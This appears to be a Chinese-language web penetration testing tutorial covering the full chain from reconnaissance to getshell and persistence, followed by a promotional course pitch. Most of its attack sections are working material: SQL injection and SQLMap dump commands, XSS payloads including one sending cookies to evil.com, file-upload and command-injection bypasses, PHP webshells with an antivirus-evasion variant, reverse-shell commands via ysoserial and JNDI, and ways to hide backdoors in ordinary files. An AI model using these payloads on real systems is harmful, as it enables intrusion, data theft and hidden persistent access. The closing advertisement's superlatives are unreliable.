Web渗透不知道从何入手?漏洞挖不到?扫描器跑了半天没有结果?
全文按真实渗透流程拆解,从信息收集到拿权限,每个环节都有工具命令和实操技巧,看完就能上手实战!

一、Web渗透全流程概览
Web渗透测试遵循标准化的方法论,按照阶段依次推进,每个阶段都有明确的输入和输出。
渗透测试全流程
信息收集 → 端口扫描 → 指纹识别 → 漏洞扫描 → 手工测试 → 漏洞利用 → 权限获取 → 权限维持 → 报告编写
各阶段核心产出
| 信息收集 | 梳理攻击面 | OneForAll、Sublist3r、Google Hacking | 子域名、目录、敏感文件 |
| 端口扫描 | 发现开放服务 | Nmap、Masscan | 端口清单、服务版本 |
| 指纹识别 | 识别技术栈 | Wappalyzer、whatweb | CMS框架、中间件版本 |
| 漏洞扫描 | 自动化发现 | AWVS、Nikto、Xray | 漏洞列表(需人工验证) |
| 手工测试 | 深度验证 | Burp Suite | 确认漏洞+利用条件 |
| 漏洞利用 | 获取权限 | SQLMap、MSF、自写EXP | Getshell/数据 |
| 权限维持 | 持久化访问 | WebShell、内存马 | 后门 |
提示: 信息收集阶段花的时间越多,后续渗透效率越高。很多0day级漏洞其实是通过细致的信息收集发现的。
二、信息收集实战
1. 子域名收集
# OneForAll 全面子域名收集
python3 oneforall.py –target example.com run
# Sublist3r 子域名枚举
python3 sublist3r.py -d example.com -o subs.txt
# 使用 amass 深度收集
amass enum -d example.com -active -brute
# crt.sh 证书透明度查询
curl -s "https://crt.sh/?q=example.com&output=json" | jq -r '.[].name_value' | sort -u
# Google Hacking
site:example.com -www
site:example.com filetype:pdf
site:example.com inurl:admin
2. 目录扫描
# dirsearch 目录扫描
python3 dirsearch.py -u https://target.com -e php,asp,jsp,html,js -t 30
# gobuster 快速扫描
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -t 50
# ffuf Fuzzing工具
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403
# 扫描备份文件
ffuf -u https://target.com/FUZZ.zip -w domain.txt -mc 200
3. 敏感信息泄露
| 后台地址 | site:target.com inurl:admin/login | 高 |
| 配置文件 | site:target.com filetype:env OR filetype:conf | 极高 |
| 数据库文件 | site:target.com filetype:sql OR filetype:mdb | 极高 |
| 源码泄露 | site:target.com filetype:git OR filetype:svn | 极高 |
| 敏感文档 | site:target.com filetype:pdf inurl:password | 高 |
| 测试页面 | site:target.com inurl:test OR inurl:phpinfo | 中 |
| 错误信息 | site:target.com inurl:error OR “SQL syntax” | 中 |
注意: Google Hacking仅用于信息收集,不要尝试直接访问他人未授权的系统。
三、指纹识别与技术栈分析
1. 工具识别
# whatweb 识别技术栈
whatweb -a 3 https://target.com
# wappalyzer 浏览器插件
# 手动查看HTTP响应头中的Server、X-Powered-By、Set-Cookie等字段
# CMS识别
python3 cmseek.py -u https://target.com
python3 whatcms.py -u https://target.com
2. 手动指纹识别技巧
| Web服务器 | 响应头Server | Apache/Nginx/IIS |
| 后端语言 | 响应头X-Powered-By | PHP/ASP.NET/JSP |
| CMS框架 | 页面源码meta、cookie | WordPress/Drupal/Discuz |
| 前端框架 | 源码script src | Vue/React/Angular |
| CDN/WAF | 响应头、Trace | Cloudflare/阿里云WAF |
| 中间件 | 错误页面、默认页 | Tomcat/WebLogic/Nginx |
# 查看HTTP完整响应头
curl -I https://target.com
# 查看cookie特征
curl -s -v https://target.com 2>&1 | grep -i set-cookie
四、漏洞挖掘核心思路
1. SQL注入
SQL注入是Web安全中最经典也最危险的漏洞之一,核心是用户输入未经过滤直接拼接到SQL查询中。
# 手工检测流程
# 1. 找到带参数的URL
http://target.com/news.php?id=1
# 2. 测试是否有注入
http://target.com/news.php?id=1' # 报错
http://target.com/news.php?id=1 and 1=1 # 正常
http://target.com/news.php?id=1 and 1=2 # 异常
# 3. 判断注入类型
# 数字型:and 1=1 / and 1=2
# 字符型:' and '1'='1 / ' and '1'='2
# 搜索型:%' and 1=1 and '% like '%
# 4. 使用SQLMap自动化
sqlmap -u "http://target.com/news.php?id=1" –batch –dbs
sqlmap -u "http://target.com/news.php?id=1" –dump -D dbname -T users
| 报错注入 | 页面回显错误 | updatexml()/extractvalue() | 大小写混合 |
| 联合注入 | 有回显位 | UNION SELECT | 空格绕过/**/ |
| 盲注-布尔 | 无回显有差异 | and 1=1/1=2 | 双重URL编码 |
| 盲注-时间 | 无差异 | sleep()/benchmark() | 替换函数 |
| 堆叠注入 | 支持多语句 | ;drop table | –后注释 |
2. XSS跨站脚本
// 反射型XSS测试Payload
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
// 存储型XSS – 留言板/评论区
<script>document.location='http://evil.com/?c='+document.cookie</script>
// DOM型XSS
# 1. 找到可控输入的DOM操作
# 2. 构造URL触发DOM XSS
http://target.com/page.html#<img src=x onerror=alert(1)>
// 绕过过滤技巧
<img src=x onerror="al\\u0065rt(1)">
<script>window['al'+'ert'](1)</script>
<body onload=alert(1)>
警告: XSS测试Payload可能会影响其他用户,在真实环境中测试需谨慎,获取授权后方可进行。
3. 文件上传漏洞
# 常见绕过方式
# 1. 前端绕过 – Burp抓包改后缀
shell.php → shell.php.jpg → Burp修改回shell.php
# 2. MIME绕过
Content-Type: image/jpeg → 实际上传PHP文件
# 3. 后缀绕过
shell.php5 / shell.phtml / shell.pht / shell.phar
# 4. .htaccess绕过
# 先上传 .htaccess 文件
AddType application/x-httpd-php .jpg
# 再上传 shell.jpg(内含PHP代码)
# 5. 大小写绕过
shell.PHP / shell.PhP
# 6. 空格/点绕过
shell.php[空格] / shell.php.
4. 命令执行漏洞
# 命令拼接符号
; | || && | &
# 测试Payload
127.0.0.1;whoami
127.0.0.1|whoami
127.0.0.1&&whoami
# 绕过空格过滤
127.0.0.1;{whoami,}
127.0.0.1;cat${IFS}/etc/passwd
# 绕过命令关键字过滤
whoami –> w'h'o'a'm'i / who""ami / /bin/whoami
五、Getshell常用姿势
1. SQL注入写WebShell
# MySQL写入文件
sqlmap -u "http://target.com?id=1" –file-write="shell.php" –file-dest="/var/www/html/shell.php"
# 手工写文件
1' UNION SELECT 1,'<?php @eval($_POST[cmd]);?>',3 INTO OUTFILE '/var/www/html/shell.php' –+
2. 文件上传GetShell
// 一句话木马
<?php @eval($_POST['cmd']); ?>
// 免杀版WebShell
<?php
$a = "ass";
$b = "ert";
$c = $a.$b;
$c($_POST['cmd']);
?>
3. 反序列化GetShell
// Java反序列化漏洞利用
# 使用 ysoserial 生成Payload
java –jar ysoserial.jar CommonsCollections1 'bash –i >& /dev/tcp/192.168.1.5/4444 0>&1' | base64
# 使用 JNDI注入
java –jar JNDI–Injection–Exploit.jar –C "bash -i >& /dev/tcp/192.168.1.5/4444 0>&1"
| SQL注入写文件 | secure_file_priv+路径 | 中 | MySQL注入OUTFILE |
| 文件上传 | 上传点+解析支持 | 低 | 图片上传+容器解析 |
| 反序列化 | 反序列化入口 | 高 | Java/PHP/Python应用 |
| 文件包含 | 包含函数+可控参数 | 高 | PHP include/require |
| 命令执行 | 命令拼接+无过滤 | 中 | 系统命令调用 |
| SSRF | 内网请求+协议支持 | 高 | URL请求转发 |
提示: GetShell后第一时间确认当前权限,然后查看是否有杀软,避免WebShell被查杀。
六、WebShell权限维持
// 隐藏WebShell技巧
// 1. 将WebShell藏在正常文件中
// 在正常PHP文件的注释中插入
/* <?php eval($_POST['cmd']); ?> */
// 2. 利用 .htaccess 隐藏后门
<FilesMatch "config\\.php">
php_flag engine on
</FilesMatch>
// 3. 内存马(Java – Filter型)
// 注册恶意Filter到FilterChain,无需落地文件
// 4. 图片马
copy normal.jpg/b + shell.php/a shell.jpg
警告: 所有渗透测试必须在授权范围内进行。未经授权的渗透测试是违法行为,可能触犯《网络安全法》和《刑法》相关条款。
学习资源
2026年最新版本,全网最全的网安视频教程。耗时半年打造,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。
内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的Web漏洞挖掘、免杀WebShell等高阶技术。

总共200多节视频,200多G的资源,不用担心学不全。(包含SQL注入、XSS、文件上传、反序列化、SSRF等技术点)
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析Web漏洞挖掘的底层原理与高级绕过策略,并对业内挑战最大的WAF绕过、免杀WebShell等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从信息收集、指纹识别、漏洞扫描、漏洞利用到检测响应、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、部分核心内容展示
独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识

2、Web架构基础与HTTP协议

3、信息收集实战

4、Web漏洞挖掘详解

5、SQL注入与XSS攻防

3、适合学习的人群
一、基础适配人群
零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
二、能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握Web漏洞挖掘、Getshell等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web渗透、漏洞挖掘等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传,戳下面拿:
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取

————————————————
网硕互联帮助中心![2019年下半年网络管理员[案例分析]考试下午真题(答案+ 解析)-网硕互联帮助中心](https://www.wsisp.com/helps/wp-content/uploads/2026/09/20260909153309-6aa17c359df88-220x150.png)





评论前必须登录!
注册